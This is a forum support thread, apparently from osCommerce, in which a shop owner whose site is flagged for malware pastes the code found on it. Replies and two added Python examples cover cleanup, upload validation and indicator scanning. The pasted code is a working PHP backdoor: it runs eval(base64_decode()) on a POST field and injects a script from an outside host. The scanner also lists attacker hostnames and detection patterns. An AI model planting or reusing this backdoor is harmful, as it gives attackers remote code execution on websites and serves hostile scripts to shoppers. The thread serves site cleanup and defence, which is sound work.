
osCommerce


Malware Website


labmais


Posted

Hello,

my website has been classified as a malware website since one or two weeks ago.

http://estereomicroscopio.com.br/

I tried to clean it in many ways.

Does anyone know what can be done to solve it?

ANOTHER QUESTION

When I go into some category, I get a link like this: http://estereomicroscopio.com.br/catalogo/banho-maria-c-64.html

The question is: how is this link generated? I checked my files but there is no such .html file.

Is it stored anywhere?

E-commerce?

No external links please.

Posted

You have some sort of "SEO" add-on/mod installed, that generates URLs that look like that. There are no ".html" files in osC, so stop looking for them. Everything is generated by PHP, with a fake name of .html for SEO purposes (hides the underlying technology).

 

As far as cleaning up your site from the malware infection, it's obvious that you're missing something, as you don't understand anything about how your site works. Look around for posts explaining the ways that sites can be secured, and how to clean them up once infected. I seem to recall that "germ" and "Dunweb" have posted on this subject many times, so you might start by searching for their postings.

Posted

Rafael,

You have to check ALL of the files in your osCommerce installation and remove ALL malicious code and anomalous files.

As Phil stated, there are NO HTML files in osCommerce.

Chris

Posted

I see Chris, and I'm grateful for your help.

I received a report from Google.

GOOGLE REPORT

Last checked: November 3, 2011

Suspected injected code Instances

<script src=http://infocenc.com.br/js/>

It says that there is malicious code on it, right?? How can I fix this specific reported URL?

About checking all files... There is no problem doing that, but how can I do that?

If I check all the files, what do I need to look for?


Posted

Rafael,

Check all of your files for this:

<script src=http://infocenc.com.br/js/>

OR, a base64 script line.

Once your site has been cleaned and secured, you can then contact Google to remove your site from the blacklist.

Chris

Posted

Two things:

1st - I have already checked all files and all DB tables for the mentioned script.

Found only one result, and it was inside the DB.

More specifically, in the configuration table.

2nd - I have really seen a base64 script, but it seemed to be OK and I didn't touch it.

So is the base64 bad code?

The report mentioned this URL too as damaging inside my website:

drcutrapalis.orge.pl

base64 code

<?php
// Posted code, reformatted for readability only; behaviour is unchanged.
global $sessdt_o;
if(!$sessdt_o) {
    $sessdt_o = 1;
    $sessdt_k = "lb11";
    if(!@$_COOKIE[$sessdt_k]) {
        // first visit: set a marker cookie
        $sessdt_f = "102";
        if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); }
        else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
    } else {
        if($_COOKIE[$sessdt_k]=="102") {
            // second visit: change the cookie, emit a remote script tag and a redirect
            $sessdt_f = (rand(1000,9000)+1);
            if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); }
            else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
            $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"];
            $sessdt_v = urlencode(strrev($sessdt_j));
            $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200);
            echo "<script src='$sessdt_u'></script>";
            echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
        }
    }
    // the part that makes this a backdoor: evaluates base64-encoded PHP taken from a POST field
    $sessdt_p = "showimg";
    if(isset($_POST[$sessdt_p])){
        eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
        exit;
    }
}

#/*
header("Location:catalogo/");
#*/
function decode_pwd($pwd) {
 $pwd = preg_replace("/TmE=|Q2w=/","",base64_decode($pwd));
 return base64_decode($pwd);
}
$config = file("config.txt");
foreach($config as $key => $value) {
 $config[$key] = trim($value);
}
$title	   = $config[0];
$keywords	= $config[1];
$description = $config[2];
$catalog	 = $config[3];
$addr		= $config[4];
$server_addr = $config[5];
$server_user = $config[6];
$server_pass = decode_pwd($config[7]);
$server_db   = $config[8];
?>


Posted

If it's not in the base osC code, then yes, it's bad. I don't have the code available to compare against right now, but the code you listed above certainly doesn't look like it belongs in osC.

 

After removing it, you've only begun the battle. You have to figure out how the hacker might have gotten in and planted that code, and then seal up all the holes in your site. Germ and DunWeb have posted a lot on that section, so go looking there.

Posted

Ok, I will.

Only one last question.

Should all base64 code be deleted??

I will do another search on my files.

I guess that the "hacker" could get in through an "open door" in the image upload system.

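Added example, not code from this thread or from osCommerce: if the image upload is the suspected "open door", these are the checks a defender would put in front of it. Python, assuming uploads are written as static files under a single images directory and that the server never executes anything from that directory; every filename and byte string below is constructed for the demo.

```python
"""Image upload validation: reject the usual ways a script gets smuggled in
behind an image extension (wrong or double extension, non-image bytes,
PHP or script text embedded in an otherwise valid image).
Assumption: uploads land in one static images directory (hypothetical layout)."""
import os
import re
import secrets

# Allowed extensions and the magic bytes a file of that type must start with.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024  # constructed limit for the demo
# Text that has no business inside an image file served by a web shop.
EMBEDDED_CODE = re.compile(rb"<\?php|<\?=|<script\b|eval\s*\(|base64_decode\s*\(", re.I)
# Stem must be plain characters: blocks "shell.php.jpg", spaces, slashes, nulls.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_image_upload(filename, data):
    """Return (ok, reason). ok is True only when every check passes."""
    base = os.path.basename(filename)
    if base != filename:
        return False, "path component in filename"
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} not allowed"
    if "." in stem or not SAFE_NAME.match(stem):
        return False, "unsafe filename"
    if not data or len(data) > MAX_BYTES:
        return False, "empty or too large"
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match declared image type"
    if EMBEDDED_CODE.search(data):
        return False, "embedded script text inside image"
    return True, "ok"


def storage_name(filename):
    """Server-chosen file name: keep only the (already validated) extension,
    discard whatever name the client supplied."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(8) + ext


if __name__ == "__main__":
    # Constructed samples, not real uploads.
    samples = {
        "product.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
        "shell.php.jpg": b"\xff\xd8\xff" + b"\x00" * 8,
        "logo.gif": b"GIF89a" + b"<?php eval($_POST['x']); ?>",
        "../escape.jpg": b"\xff\xd8\xff\x00",
        "x.php": b"<?php",
    }
    for name, body in samples.items():
        ok, reason = validate_image_upload(name, body)
        print(f"{name!r}: {'ACCEPT as ' + storage_name(name) if ok else 'REJECT: ' + reason}")
```

The byte-pattern check is cheap but not complete: re-encoding every accepted image with an image library (GD or ImageMagick on a PHP host) discards any payload hidden in metadata or trailing bytes, and the server should also be configured so that nothing under the images directory is ever executed as PHP.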

Posted

Rafael,

Not necessarily; there are some instances (especially with payment modules) where the base64 function is used to hide information for security reasons.

Chris

Posted

Ok, I get it, I have to be careful...

What about this specific code that I showed? Is it bad or good code?

Thanks


Posted

Rafael,

No, that code is not good.

Chris
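Added example, not code from this thread or from osCommerce: a scanner that walks a store's files for the two indicators Chris listed earlier (the injected script tag from the Google report, and "a base64 script line") while applying his later caveat that base64 on its own is legitimate. It reports eval() wrapped around base64_decode() or around request input (the shape of the posted code) as malicious, and lists plain base64 calls only for manual review. The hostnames are the ones quoted in this thread and are used purely as strings to match; the files it scans are constructed for the demo (with a shortened copy of the posted backdoor shape), and nothing is fetched from the network. Python rather than PHP so it can be run from a workstation against a downloaded copy of the site.

```python
"""Indicator scanner for an osCommerce file tree (added example, not osC code).
Assumed usage: python scan.py /path/to/site_copy, or run with no argument
to scan the constructed sample tree built by run_demo()."""
import re
import sys
import tempfile
from pathlib import Path

# The exact tag quoted in the Google report in this thread.
INJECTED_TAG = "<script src=http://infocenc.com.br/js/>"
# Hosts named in the thread as serving injected content (string constants only).
BAD_HOSTS = ("infocenc.com.br", "turnitupnow.net", "drcutrapalis.orge.pl")

MALICIOUS = {
    "injected_script_tag": re.compile(re.escape(INJECTED_TAG), re.I),
    # eval(base64_decode(...)) is the classic obfuscated-backdoor shape.
    "eval_of_base64": re.compile(r"\beval\s*\(\s*@?\s*base64_decode\s*\(", re.I),
    # eval() over anything derived from request input is a remote-code-execution backdoor.
    "eval_of_request_input": re.compile(r"\beval\s*\(.*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
    "script_from_listed_host": re.compile(
        r"<script[^>]*src=['\"]?https?://(?:" + "|".join(re.escape(h) for h in BAD_HOSTS) + ")",
        re.I),
}
# A bare base64 call is only a review item: payment modules use it legitimately.
BASE64_ANY = re.compile(r"\bbase64_(?:encode|decode)\s*\(", re.I)
SCAN_EXT = {".php", ".inc", ".html", ".htm", ".js", ".txt"}


def classify_line(line):
    """Return (list of malicious indicator names, needs_manual_review) for one line."""
    hits = [name for name, rx in MALICIOUS.items() if rx.search(line)]
    review = bool(BASE64_ANY.search(line)) and not hits
    return hits, review


def scan_tree(root):
    """Walk root; return {relative_path: {"malicious": [(name, lineno)], "review": [lineno]}}."""
    root = Path(root)
    results = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCAN_EXT:
            continue
        entry = {"malicious": [], "review": []}
        for lineno, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
            hits, review = classify_line(line)
            entry["malicious"].extend((name, lineno) for name in hits)
            if review:
                entry["review"].append(lineno)
        if entry["malicious"] or entry["review"]:
            results[path.relative_to(root).as_posix()] = entry
    return results


# Constructed sample files (not real store files) so the scanner runs offline.
SAMPLE_FILES = {
    "index.php": ("<?php require('includes/application_top.php'); ?>\n"
                  "<html><head>" + INJECTED_TAG + "</head><body>store</body></html>\n"),
    "includes/application_top.php": (
        "<?php\n"
        "// shortened copy of the backdoor shape posted in the thread\n"
        "if (isset($_POST['showimg'])) { eval(base64_decode(str_replace(chr(32), chr(43), "
        "$_POST['showimg']))); exit; }\n"
        "?>\n"),
    "includes/modules/payment/example_gateway.php": (
        "<?php\n"
        "// legitimate use: a payment module packing its own data, no eval involved\n"
        "$packed = base64_encode(serialize($order_details));\n"
        "$restored = unserialize(base64_decode($packed));\n"
        "?>\n"),
}


def run_demo():
    """Write the constructed sample tree to a temp dir, scan it, return the findings."""
    tmp = Path(tempfile.mkdtemp(prefix="osc_scan_"))
    for rel, body in SAMPLE_FILES.items():
        target = tmp / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return scan_tree(tmp)


if __name__ == "__main__":
    findings = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else run_demo()
    for rel, entry in sorted(findings.items()):
        for name, lineno in entry["malicious"]:
            print(f"MALICIOUS {rel}:{lineno} {name}")
        for lineno in entry["review"]:
            print(f"REVIEW    {rel}:{lineno} base64 use, inspect manually")
```

A file scan alone would have missed Rafael's case, where the only copy of the injected tag sat in the database configuration table, so the same patterns should also be run over a database dump (or over the relevant table rows) before asking Google for a review.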

Posted

Once you have cleaned out your site, have a quick look at this page:

http://www.oscommerce.com/forums/topic/375288-updated-security-thread/

There are a number of recommendations in there that will help you not get reinfected again.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
